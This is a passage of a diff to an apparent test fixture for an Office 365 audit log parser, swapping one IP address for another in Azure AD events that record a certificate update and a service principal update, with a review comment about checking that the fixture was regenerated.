\":\"531446ed-abd2-468f-96a8-a4dcc7b05168\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:42:45.0442303Z\"},{\"Name\":\"env_epoch\",\"Value\":\"VYXPT\"},{\"Name\":\"env_seqNum\",\"Value\":\"45826385\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##51f1503a-20a3-43cd-b898-bea330e149be_00000000-0000-0000-0000-000000000000_51f1503a-20a3-43cd-b898-bea330e149be\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR559\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"20a82fa1-625b-491a-a3e8-54d779a9b17e\",\"ModifiedProperties\":[{\"Name\":\"KeyDescription\",\"NewValue\":\"[\\r\\n \\\"[KeyIdentifier=6d944a5f-234c-4879-8de4-39f089d8b96b,KeyType=AsymmetricX509Cert,KeyUsage=Verify,DisplayName=E=asr@example.net, CN=testsiem.onmicrosoft.com, OU=SIEM, O=Elastic, L=Barcelona, S=Barce]\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Included Updated 
Properties\",\"NewValue\":\"KeyDescription\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Update application – Certificates and secrets management \",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -18742,9 +18742,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-11T16:42:45", "ExtendedProperties": [ { 
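Review bot: The new `event.original` string embeds the replacement address `67.43.156.15` verbatim, so this expected file is only trustworthy if it was regenerated from the updated input fixture rather than hand-edited; a hand edit would leave any derived fields that also carry the address (`source.ip`, `related.ip`, geo enrichment if the pipeline performs it — all outside this hunk) out of step with the parsed `o365audit.ActorIpAddress`/`ClientIP` values shown in the hunk that follows. The same pattern applies to the hunks at @@ -18947, @@ -19182 and @@ -19429, so it only needs checking once. I would ask the author to confirm the file came from a regeneration run, since the pairing of raw string and parsed fields is what this fixture exists to pin down.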
@@ -18947,7 +18947,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:42:45\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"KeyDescription\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"531446ed-abd2-468f-96a8-a4dcc7b05168\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 
Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:42:45.0442303Z\"},{\"Name\":\"env_epoch\",\"Value\":\"VYXPT\"},{\"Name\":\"env_seqNum\",\"Value\":\"45826385\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##51f1503a-20a3-43cd-b898-bea330e149be_00000000-0000-0000-0000-000000000000_51f1503a-20a3-43cd-b898-bea330e149be\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR559\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"20a82fa1-625b-491a-a3e8-54d779a9b17e\",\"ModifiedProperties\":[{\"Name\":\"KeyDescription\",\"NewValue\":\"[\\r\\n \\\"[KeyIdentifier=6d944a5f-234c-4879-8de4-39f089d8b96b,KeyType=AsymmetricX509Cert,KeyUsage=Verify,DisplayName=E=asr@example.net, CN=testsiem.onmicrosoft.com, OU=SIEM, O=Elastic, L=Barcelona, S=Barce]\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"KeyDescription\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Update application – Certificates and secrets management 
\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:42:45\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"KeyDescription\\\"]\"},{\"Name\":\"correlationId\",\"Value
\":\"531446ed-abd2-468f-96a8-a4dcc7b05168\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:42:45.0442303Z\"},{\"Name\":\"env_epoch\",\"Value\":\"VYXPT\"},{\"Name\":\"env_seqNum\",\"Value\":\"45826385\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##51f1503a-20a3-43cd-b898-bea330e149be_00000000-0000-0000-0000-000000000000_51f1503a-20a3-43cd-b898-bea330e149be\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR559\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"20a82fa1-625b-491a-a3e8-54d779a9b17e\",\"ModifiedProperties\":[{\"Name\":\"KeyDescription\",\"NewValue\":\"[\\r\\n \\\"[KeyIdentifier=6d944a5f-234c-4879-8de4-39f089d8b96b,KeyType=AsymmetricX509Cert,KeyUsage=Verify,DisplayName=E=asr@example.net, CN=testsiem.onmicrosoft.com, OU=SIEM, O=Elastic, L=Barcelona, S=Barce]\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Included Updated 
Properties\",\"NewValue\":\"KeyDescription\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Update application – Certificates and secrets management \",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -18977,9 +18977,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-11T16:42:45", "ExtendedProperties": [ { 
@@ -19182,7 +19182,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:42:45\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"531446ed-abd2-468f-96a8-a4dcc7b05168\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 
Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:42:45.1042022Z\"},{\"Name\":\"env_epoch\",\"Value\":\"VYXPT\"},{\"Name\":\"env_seqNum\",\"Value\":\"45826464\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##51f1503a-20a3-43cd-b898-bea330e149be_00000000-0000-0000-0000-000000000000_51f1503a-20a3-43cd-b898-bea330e149be\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR559\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"15adbe69-7974-41ec-8341-208456600ad3\",\"ModifiedProperties\":[{\"Name\":\"Included Updated Properties\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Update service 
principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:42:45\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{
\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"531446ed-abd2-468f-96a8-a4dcc7b05168\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:42:45.1042022Z\"},{\"Name\":\"env_epoch\",\"Value\":\"VYXPT\"},{\"Name\":\"env_seqNum\",\"Value\":\"45826464\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##51f1503a-20a3-43cd-b898-bea330e149be_00000000-0000-0000-0000-000000000000_51f1503a-20a3-43cd-b898-bea330e149be\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR559\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"15adbe69-7974-41ec-8341-208456600ad3\",\"ModifiedProperties\":[{\"Name\":\"Included Updated 
Properties\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Update service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -19212,9 +19212,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-11T16:42:45", "ExtendedProperties": [ { 
@@ -19429,7 +19429,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:42:45\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"531446ed-abd2-468f-96a8-a4dcc7b05168\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 
